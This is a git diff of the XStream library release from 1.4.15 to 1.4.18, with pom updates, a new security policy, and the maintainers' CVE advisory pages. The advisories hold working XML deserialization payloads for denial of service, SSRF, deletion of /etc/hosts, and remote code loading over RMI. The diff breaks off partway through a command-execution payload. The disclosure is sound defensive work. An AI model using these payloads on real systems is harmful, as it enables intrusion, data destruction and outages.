diff --git a/SECURITY.md b/SECURITY.md
new file mode 100644
index 0000000000000000000000000000000000000000..4493f9ff554e0cc94128e724361adc10e6807b2a
--- /dev/null
+++ b/SECURITY.md
@@ -0,0 +1,20 @@
+# Security Policy
+
+## Supported Versions
+
+The 1.4.x version is actively maintained.
+
+| Version | Supported |
+| ------- | ------------------ |
+| 1.4.x | :white_check_mark: |
+| < 1.4.0 | :x: |
+
+## Reporting a Vulnerability
+
+If you have identified a security issue, ask on the [XStream mailing list](https://groups.google.com/group/xstream-user)
+for access to the XStream Security list and you will receive an invitation. Send a security report there with details to
+reproduce the problem with the latest XStream version.
+
+Note, that XStream cares about security issues with XStream itself or in combination with the Java runtime, but not with
+3rd party libraries. It is in the resposibility of each developer who brings those libraries together to setup the
+[XStream Security Framework](https://x-stream.github.io/security.html#framework) properly.
diff --git a/pom.xml b/pom.xml
index 2c5cb4302d14a182b1d91f973bc3f17da15d813b..19a331c3742977115c464014b589964fc5cb4eac 100644
--- a/pom.xml
+++ b/pom.xml
@@ -1,7 +1,7 @@
 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
 <!-- Copyright (C) 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018, 2019, 2020 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018, 2019, 2020, 2021 XStream committers.
 All rights reserved.
 The software in this package is published under the terms of the BSD
@@ -14,7 +14,7 @@
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-parent</artifactId>
 <packaging>pom</packaging>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 <name>XStream Parent</name>
 <url>http://x-stream.github.io</url>
 <description>
@@ -410,12 +410,12 @@
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 </dependency>
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 <classifier>tests</classifier>
 <type>test-jar</type>
 <scope>test</scope>
@@ -423,43 +423,43 @@
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 <classifier>javadoc</classifier>
 <scope>provided</scope>
 </dependency>
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-hibernate</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 </dependency>
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-hibernate</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 <classifier>javadoc</classifier>
 <scope>provided</scope>
 </dependency>
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-jmh</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 </dependency>
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-jmh</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 <classifier>javadoc</classifier>
 <scope>provided</scope>
 </dependency>
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-benchmark</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 </dependency>
 <dependency>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-benchmark</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 <classifier>javadoc</classifier>
 <scope>provided</scope>
 </dependency>
@@ -575,6 +575,11 @@
 </exclusions>
 </dependency>
+ <dependency>
+ <groupId>io.github.x-stream</groupId>
+ <artifactId>mxparser</artifactId>
+ <version>${version.io.github.x-stream.mxparser}</version>
+ </dependency>
 <dependency>
 <groupId>xpp3</groupId>
 <artifactId>xpp3_min</artifactId>
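Review bot: The new `io.github.x-stream:mxparser` dependency in the hunk at 575 is declared directly before the `xpp3:xpp3_min` entry, which stays in place, and nothing in the hunk records why a second XmlPull parser artifact is now managed or which modules are meant to move to it, so anyone auditing this release's dependency tree cannot tell whether `xpp3_min` is now legacy or still required. Add a one-line comment above the new `<dependency>`, e.g. `<!-- MXParser (io.github.x-stream), presumably the maintained fork of the xpp3 parser; xpp3_min is kept because <reason to be filled in> -->`, and check that no module ends up with both parsers on its runtime classpath. Its version is taken from the `version.io.github.x-stream.mxparser` property added in the later hunk at 1151, which follows the file's convention. The enclosing dependencies block begins and ends outside the hunk.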
@@ -1099,8 +1104,8 @@
 <scm>
 <url>http://github.com/x-stream/xstream</url>
- <developerConnection>scm:git:https://github.com/x-stream/xstream.git</developerConnection>
- <connection>scm:git:https://github.com/x-stream/xstream.git</connection>
+ <developerConnection>scm:git:ssh://git@github.com/x-stream/xstream.git</developerConnection>
+ <connection>scm:git:ssh://git@github.com/x-stream/xstream.git</connection>
 <tag>v-1.4.x</tag>
 </scm>
@@ -1123,7 +1128,7 @@
 <version.plugin.maven.deploy>2.3</version.plugin.maven.deploy>
 <version.plugin.maven.enforcer>1.4</version.plugin.maven.enforcer>
 <version.plugin.maven.failsafe>2.22.0</version.plugin.maven.failsafe>
- <version.plugin.maven.gpg>1.6</version.plugin.maven.gpg>
+ <version.plugin.maven.gpg>3.0.1</version.plugin.maven.gpg>
 <version.plugin.maven.install>2.2</version.plugin.maven.install>
 <version.plugin.maven.jar>2.2</version.plugin.maven.jar>
 <version.plugin.maven.javadoc>2.10</version.plugin.maven.javadoc>
@@ -1146,6 +1151,7 @@
 <version.commons.lang>2.4</version.commons.lang>
 <version.dom4j>1.6.1</version.dom4j>
 <version.hsqldb>2.2.8</version.hsqldb>
+ <version.io.github.x-stream.mxparser>1.2.2</version.io.github.x-stream.mxparser>
 <version.javaassist>3.12.1.GA</version.javaassist>
 <version.javax.activation>1.1.1</version.javax.activation>
 <version.javax.annotation.api>1.3.2</version.javax.annotation.api>
diff --git a/xstream-benchmark/pom.xml b/xstream-benchmark/pom.xml
index 724aaf552c1a0d94b5b49a0925610ed377e25719..7e87319b03e9845917d99c62e9235a95c7128ec7 100644
--- a/xstream-benchmark/pom.xml
+++ b/xstream-benchmark/pom.xml
@@ -14,7 +14,7 @@
 <parent>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-parent</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 </parent>
 <artifactId>xstream-benchmark</artifactId>
 <packaging>jar</packaging>
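Review bot: In the `<scm>` hunk at 1099 the read-only `<connection>` URL is switched to `scm:git:ssh://git@github.com/x-stream/xstream.git` together with `<developerConnection>`; Maven defines `<connection>` as the anonymous, read-only access URL, so any tooling that clones through it (`scm:checkout`, or CI that resolves the parent's SCM information) now needs a GitHub SSH key where the previous https URL worked without credentials. Only `<developerConnection>` should carry the authenticated ssh form; keep `<connection>scm:git:https://github.com/x-stream/xstream.git</connection>` as it was. If the ssh change was made so that the release tooling can push tags over ssh, `<developerConnection>` alone covers that.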
diff --git a/xstream-distribution/pom.xml b/xstream-distribution/pom.xml
index 215495096d2ebdccb824d254324f5c91d1f0fd7d..bf33681da3a2ea259a9f903cff0bab6f34844f18 100644
--- a/xstream-distribution/pom.xml
+++ b/xstream-distribution/pom.xml
@@ -14,7 +14,7 @@
 <parent>
 <groupId>com.thoughtworks.xstream</groupId>
 <artifactId>xstream-parent</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
 </parent>
 <artifactId>xstream-distribution</artifactId>
 <packaging>pom</packaging>
diff --git a/xstream-distribution/src/content/CVE-2020-26217.html b/xstream-distribution/src/content/CVE-2020-26217.html
index 0d6670a1457ead742d961aecb3ee5d0b364dfeca..48f1ea3195425ba4edf6dd70cf6e331249cbe1db 100644
--- a/xstream-distribution/src/content/CVE-2020-26217.html
+++ b/xstream-distribution/src/content/CVE-2020-26217.html
@@ -134,7 +134,7 @@ xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventH
 public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
 throw new ConversionException("Unsupported type due to security reasons.");
 }
-}, XStream.PRIORITY_LOW);
+}, XStream.PRIORITY_VERY_HIGH);
 </pre></div>
 <h2 id="credits">Credits</h2>
diff --git a/xstream-distribution/src/content/CVE-2020-26258.html b/xstream-distribution/src/content/CVE-2020-26258.html
index 61777c2e67f34bb5ad9022862b2c2acedd52dfc3..e71888ca472b291be642b1f1faefc16d6720564d 100644
--- a/xstream-distribution/src/content/CVE-2020-26258.html
+++ b/xstream-distribution/src/content/CVE-2020-26258.html
@@ -104,7 +104,7 @@ xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..
 public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
 throw new ConversionException("Unsupported type due to security reasons.");
 }
-}, XStream.PRIORITY_LOW);
+}, XStream.PRIORITY_VERY_HIGH);
 </pre></div>
 <h2 id="credits">Credits</h2>
diff --git a/xstream-distribution/src/content/CVE-2020-26259.html b/xstream-distribution/src/content/CVE-2020-26259.html
index a3365901e3caa0361619666923bd2847000543a3..64bdaf6e261407d4c85b9840c6453762dfea05f4 100644
--- a/xstream-distribution/src/content/CVE-2020-26259.html
+++ b/xstream-distribution/src/content/CVE-2020-26259.html
@@ -29,7 +29,7 @@
 <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
 XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
- input stream and replace or inject objects, that result in a server-side forgery request.</p>
+ input stream and replace or inject objects, that result in the deletion of a file on the local host.</p>
 <h2 id="reproduction">Steps to Reproduce</h2>
@@ -60,7 +60,7 @@ xstream.fromXML(xml);
 </pre></div>
- <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the referenced file is deleted.</p>
 <p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
@@ -107,7 +107,7 @@ xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..
 public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
 throw new ConversionException("Unsupported type due to security reasons.");
 }
-}, XStream.PRIORITY_LOW);
+}, XStream.PRIORITY_VERY_HIGH);
 </pre></div>
 <h2 id="credits">Credits</h2>
diff --git a/xstream-distribution/src/content/CVE-2021-21341.html b/xstream-distribution/src/content/CVE-2021-21341.html
new file mode 100644
index 0000000000000000000000000000000000000000..02b8d3830d3bd53702073aa6b74218dc0003f7ce
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21341.html
@@ -0,0 +1,89 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 10. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21341</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21341: XStream can cause a Denial of Service.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject a manipulated ByteArrayInputStream (or derived class), that can cause an endless
+ loop resulting in a denial of service.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <is class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>-2147483648</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the an endless loop is entered and the executing thread consumes maximum
+ CPU time and will never return.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU
+ type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21342.html b/xstream-distribution/src/content/CVE-2021-21342.html
new file mode 100644
index 0000000000000000000000000000000000000000..b4e9205b7191cee0a6fe8a4ed745297074dcade3
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21342.html
@@ -0,0 +1,83 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 12. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21342</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21342: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+ from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+ <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+ <packet>
+ <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+ <dataSource class='javax.activation.URLDataSource'>
+ <url>http://localhost:8080/internal/</url>
+ </dataSource>
+ </message>
+ </packet>
+ </indexMap>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+ available only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21343.html b/xstream-distribution/src/content/CVE-2021-21343.html
new file mode 100644
index 0000000000000000000000000000000000000000..b5a02fbb6bb99397bded1938efb5acffcde722fb
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21343.html
@@ -0,0 +1,127 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 16. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21343</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21343: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long
+ as the executing process has sufficient rights.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in the deletion of a file on the local host.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+ <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+ <packet>
+ <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+ <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>
+ <part>
+ <dataHead>
+ <tail/>
+ <head>
+ <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>
+ <len>3</len>
+ <data>AQID</data>
+ </data>
+ </head>
+ </dataHead>
+ <contentTransferEncoding>base64</contentTransferEncoding>
+ <msg>
+ <it class='java.util.ArrayList$Itr'>
+ <cursor>0</cursor>
+ <lastRet>1</lastRet>
+ <expectedModCount>4</expectedModCount>
+ <outer-class>
+ <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
+ <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
+ <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
+ <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
+ </outer-class>
+ </it>
+ <in class='java.io.FileInputStream'>
+ <fd/>
+ <channel class='sun.nio.ch.FileChannelImpl'>
+ <closeLock/>
+ <open>true</open>
+ <threads>
+ <used>-1</used>
+ </threads>
+ <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>
+ <sockClient>
+ <fileName>/etc/hosts</fileName>
+ <unlinkFile>true</unlinkFile>
+ </sockClient>
+ <connectionSync/>
+ </parent>
+ </channel>
+ <closeLock/>
+ </in>
+ </msg>
+ </part>
+ </dataSource>
+ </message>
+ <satellites/>
+ <invocationProperties/>
+ </packet>
+ </indexMap>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing
+ process has sufficient rights only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21344.html b/xstream-distribution/src/content/CVE-2021-21344.html
new file mode 100644
index 0000000000000000000000000000000000000000..c5614c3dc1ed31115dc4cbc6ac1d2e8c5fd00b3a
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21344.html
@@ -0,0 +1,163 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 19. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21344</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21344: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+ <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+ <packet>
+ <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+ <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
+ <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
+ <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
+ <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
+ <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>
+ <uriProperties/>
+ <attributeProperties/>
+ <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
+ <getter>
+ <class>com.sun.rowset.JdbcRowSetImpl</class>
+ <name>getDatabaseMetaData</name>
+ <parameter-types/>
+ </getter>
+ </inheritedAttWildcard>
+ </bi>
+ <tagName/>
+ <context>
+ <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
+ <outer-class reference='../..'/>
+ </marshallerPool>
+ <nameList>
+ <nsUriCannotBeDefaulted>
+ <boolean>true</boolean>
+ </nsUriCannotBeDefaulted>
+ <namespaceURIs>
+ <string>1</string>
+ </namespaceURIs>
+ <localNames>
+ <string>UTF-8</string>
+ </localNames>
+ </nameList>
+ </context>
+ </bridge>
+ </bridge>
+ <jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
+ <javax.sql.rowset.BaseRowSet>
+ <default>
+ <concurrency>1008</concurrency>
+ <escapeProcessing>true</escapeProcessing>
+ <fetchDir>1000</fetchDir>
+ <fetchSize>0</fetchSize>
+ <isolation>2</isolation>
+ <maxFieldSize>0</maxFieldSize>
+ <maxRows>0</maxRows>
+ <queryTimeout>0</queryTimeout>
+ <readOnly>true</readOnly>
+ <rowSetType>1004</rowSetType>
+ <showDeleted>false</showDeleted>
+ <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
+ <params/>
+ </default>
+ </javax.sql.rowset.BaseRowSet>
+ <com.sun.rowset.JdbcRowSetImpl>
+ <default>
+ <iMatchColumns>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ </iMatchColumns>
+ <strMatchColumns>
+ <string>foo</string>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ </strMatchColumns>
+ </default>
+ </com.sun.rowset.JdbcRowSetImpl>
+ </jaxbObject>
+ </dataSource>
+ </message>
+ <satellites/>
+ <invocationProperties/>
+ </packet>
+ </indexMap>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the code from the remote server is loaded and executed.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21345.html b/xstream-distribution/src/content/CVE-2021-21345.html
new file mode 100644
index 0000000000000000000000000000000000000000..4f027690e3c5d1df1d98af07a977e8c8e143f292
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21345.html
@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21345</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21345: XStream is vulnerable to a Remote Command Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+ <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+ <packet>
+ <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+ <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
+ <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
+ <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
+ <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
+ <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
+ <uriProperties/>
+ <attributeProperties/>
+ <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
+ <getter>
+ <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
+ <name>verify</name>
+ <parameter-types/>
+ </getter>
+ </inheritedAttWildcard>
+ </bi>
+ <tagName/>
+ <context>
+ <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
+ <outer-class reference='../..'/>
+ </marshallerPool>
+ <nameList>
+ <nsUriCannotBeDefaulted>
+ <boolean>true</boolean>
+ </nsUriCannotBeDefaulted>
+ <namespaceURIs>
+ <string>1</string>
+ </namespaceURIs>
+ <localNames>
